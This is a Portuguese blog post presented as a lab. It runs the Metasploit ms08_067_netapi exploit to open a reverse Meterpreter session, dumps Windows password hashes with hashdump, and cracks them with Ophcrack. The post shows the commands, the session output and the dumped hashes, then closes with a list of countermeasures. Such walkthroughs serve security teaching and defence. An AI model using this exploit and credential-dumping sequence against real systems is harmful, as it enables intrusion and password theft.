Ir para o conteúdo
ou

Software livre Brasil

 Voltar a Blogosfera d...
Tela cheia Sugerir um artigo

Alexandro Silva: Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack

29 de Março de 2011, 0:00 , por Software Livre Brasil - 0sem comentários ainda | Ninguém está seguindo este artigo ainda.
Visualizado 432 vezes

Quando o assunto é payload o Meterpreter é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.

Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.

Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Ophcrack. O Ophcrack é um password cracker multiplataforma livre baseado em rainbow tables para quebra de senha de sistemas Windows.

Existem tables gratuitas no site da ferramenta, porém a tables especiais são encontradas no lado negro da força.


Vamos aos testes

Iniciando um conexão com o Meterpreter e obtendo o dump de senhas

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 11.11.11.11:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 11.11.11.11
[*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011

meterpreter > hashdump

Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:9ccce0e593125118ac7357e105e50589:::

Com o hash em mão é hora do Ophcrack fazer o trabalho sujo!

Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.

Contramedidas

Use as seguintes medidas preventivas contra este tipo de ataque:

1 – Use senhas complexas;

2 – Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );

3 – Mantenha seu sistema atualizado;

4 – Mantenha o firewall local ativado;

5 – Use sistemas de proteção robustos e com checagem em tempo real da memória;

6 – Se você não está afim de gastar ( item 5 ) então utilize o MSE ( Microsoft Security Essentials ) juntamente com um firewall pessoal.


Mais informações:

How to prevent Windows from storing a LAN manager hash of your password in Active Directory and local SAM databases

Frequently Asked Questions about Passwords and Password Attacks


Fonte: http://blog.alexos.com.br/?p=2380&lang=pt-br

0sem comentários ainda

Enviar um comentário

Os campos são obrigatórios.

Se você é um usuário registrado, pode se identificar e ser reconhecido automaticamente.